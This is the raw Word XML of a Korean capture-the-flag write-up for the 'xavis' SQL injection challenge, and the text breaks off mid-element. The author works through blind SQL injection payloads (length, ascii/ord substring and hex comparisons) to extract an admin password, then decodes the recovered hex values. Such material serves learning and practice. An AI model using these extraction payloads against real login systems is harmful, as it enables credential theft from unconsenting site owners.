        <w:t xml:space="preserve">like -&gt; 정규표현식의 사용과 </w:t>
      </w:r>
      <w:r w:rsidR="00CE35BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>like 사용하는 것을 필터링</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00457369" w:rsidRDefault="00457369">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>정규표현식을 이용하여 쉽게 패스워드를 유추</w:t>
      </w:r>
      <w:r w:rsidR="001C23E6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하지 못하도록 판단</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00457369" w:rsidRPr="00457369" w:rsidRDefault="00457369">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>그래서 막아놓은 걸로 판단</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B44FF" w:rsidRDefault="00CE35BA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">addslashes 함수를 통해 </w:t>
      </w:r>
      <w:r w:rsidR="000B44FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>특수문자가 사용되는 것을 막았기 때문에 패스워드를 유추해야됨</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00412838" w:rsidRDefault="00412838">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>if((</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000BB"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>$result</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>'pw'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>]) &amp;&amp; (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000BB"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>$result</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>'pw'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>] == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000BB"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>$_GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>'pw'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>])) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000BB"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>solve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>"xavis"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00412838" w:rsidRDefault="00412838">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 부분에서 보면 패스워드를 정확하게 알아야 되는 것으로 판단.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00412838" w:rsidRDefault="00412838"/>
    <w:p w:rsidR="000B44FF" w:rsidRDefault="000B44FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>우선 admin의 패스워드 길이를 알아야됨</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B44FF" w:rsidRDefault="000B44FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pw=1</w:t>
      </w:r>
      <w:r>
        <w:t>’ or length(pw) &lt; 41 –+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B44FF" w:rsidRDefault="000B44FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">와 무슨 패스워드 길이 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">40.. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>너무한데.</w:t>
      </w:r>
      <w:r>
        <w:t>..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B44FF" w:rsidRDefault="00412838">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>1' or ascii(substring(pw,201))=0 -- '</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00412838" w:rsidRDefault="00412838">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이것도 admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>출력.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>도당채 무엇인지.</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00412838" w:rsidRDefault="00412838">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">여기서 </w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 패스워드 값에는 NULL 문자가 본래 패스워드 값을 제외하고 아주 많이 포함되어있는것으로 판단.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00412838" w:rsidRDefault="00412838">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>1' or length(trim(pw))&gt;41 -- '</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00412838" w:rsidRDefault="00412838">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이러니 guest으로 출력,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trim </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>함수는 문자열 내에서 공백 문자를 제거하는 함수임.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00412838" w:rsidRDefault="00412838"/>
    <w:p w:rsidR="003C1E5F" w:rsidRDefault="003C1E5F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>1' or ord(substring(pw,1,1))=184 -- '</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C1E5F" w:rsidRPr="003C1E5F" w:rsidRDefault="003C1E5F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1E5F">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ord </w:t>
      </w:r>
      <w:r w:rsidRPr="003C1E5F">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>함수는 문자열을 아스키코드로 바꿔주는 함수,</w:t>
      </w:r>
      <w:r w:rsidRPr="003C1E5F">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003C1E5F">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>근데 기본적인 아스키코드표 값을 벗어났음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C1E5F" w:rsidRDefault="003C1E5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문제는 이 코드값에 해당되는걸 확장아스키코드표에서 보니까 특수문자인데... </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C1E5F" w:rsidRDefault="003C1E5F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C1E5F" w:rsidRDefault="003C1E5F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C1E5F" w:rsidRPr="003C1E5F" w:rsidRDefault="003C1E5F" w:rsidP="003C1E5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1E5F">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>pw=1%27%20or%20hex(ord(substring(pw,1,1)))&gt;hex(144)--+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C1E5F" w:rsidRDefault="003C1E5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다음과 같이 넣으니 admin 출력.. 하나하나 문자의 자리를 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>값으로 검색하기로 결정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C1E5F" w:rsidRDefault="003C1E5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자동화 코드 작성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 w:rsidRPr="003D59A8">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>b8f9c5b0c6d0c4a1a4bb000000000000000000000000000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C1E5F" w:rsidRDefault="003C1E5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다음과 같은 hex값이 나옴 </w:t>
      </w:r>
      <w:r w:rsidR="003D59A8">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">여기서 </w:t>
      </w:r>
      <w:r w:rsidR="003D59A8">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="003D59A8">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>은 null 문자 하나를 뜻하는 것으로 한글자,</w:t>
      </w:r>
      <w:r w:rsidR="003D59A8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3D59A8">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">즉 </w:t>
      </w:r>
      <w:r w:rsidR="003D59A8">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="003D59A8">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>바이트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hex값 하나하나는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1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바이트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-&gt; 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총 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>40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문자</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D59A8" w:rsidRP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C1E5F" w:rsidRDefault="003C1E5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이걸 </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00A63C03">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
            <w:bCs/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://www.percederberg.net/tools/text_converter.html</w:t>
        </w:r>
      </w:hyperlink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에서 평문으로 변환</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C1E5F" w:rsidRDefault="003C1E5F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C1E5F" w:rsidRDefault="003C1E5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1E5F">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>¸ùÅ°ÆÐÄ¡¤»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C1E5F" w:rsidRDefault="003C1E5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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2018 Xavis 문제</w:t>
      </w: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우선 length(pw)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했을때 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>개로 잡힘</w:t>
      </w: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그래서 다음과 같은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Injection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코드 작성하여 가져옴</w:t>
      </w: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/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hex(ord(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>substring(pw,1,1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))&lt;hex(198)</w:t>
      </w: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그런데 이렇게 하니 HEX값 3개까지만 가져오고 나머지 9개는 전부 공백값을 가져옴</w:t>
      </w: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생각해보니 패스워드 문자열 하나당 hex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값을 가져오라고 했음</w:t>
      </w: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length 는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>개,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그러나 위에서 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hex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값 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>개만 가져옴,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즉 한 문자열의 크기는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4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바이트,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한 문자열의 크기가 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4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바이트 인 것은 한글이 있다.</w:t>
      </w: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패스워드가 한글인 경우를 생각해봄</w:t>
      </w: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injection 방식을 바꿔봄</w:t>
      </w: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/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ascii(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>substring(hex(pw),1,1)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)&lt;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hex(198)</w:t>
      </w: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패스워드 전체를 hex값으로 된 문자열로 바꿔서 </w:t>
      </w:r>
      <w:r w:rsidR="00916C0B">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>그 해당 문자열을 하나하나씩 아스키값하고 비교해서 찾아내는 것</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00916C0B" w:rsidRDefault="00916C0B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lastRenderedPageBreak/>
        <w:t xml:space="preserve">hex값을 통한 문자열의 길이는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>12, hex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값 하나는 문자열 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>개로 이루어져 있음,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즉 패스워드를 hex값으로 변환한 문자열의 길이는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24, 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반복문 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>24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로 맞춰놓고 자동화 코드 작성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00916C0B" w:rsidRDefault="00916C0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00916C0B" w:rsidRDefault="00916C0B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답은 </w:t>
      </w:r>
      <w:r w:rsidRPr="00916C0B">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0000C6B00000C6550000AD73</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B4F8A" w:rsidRDefault="008B4F8A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흠 근데 일반 hex값으로는 나오지 않음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B4F8A" w:rsidRDefault="008B4F8A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문자열 하나의 값을 ord로 변환해서 10진수랑 비교해봤는데 첫번째 자리가 50000 이상으로 나온 적이 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B4F8A" w:rsidRDefault="008B4F8A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008B4F8A" w:rsidRDefault="008B4F8A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/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>진수로 변환</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B4F8A" w:rsidRPr="008B4F8A" w:rsidRDefault="008B4F8A" w:rsidP="008B4F8A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
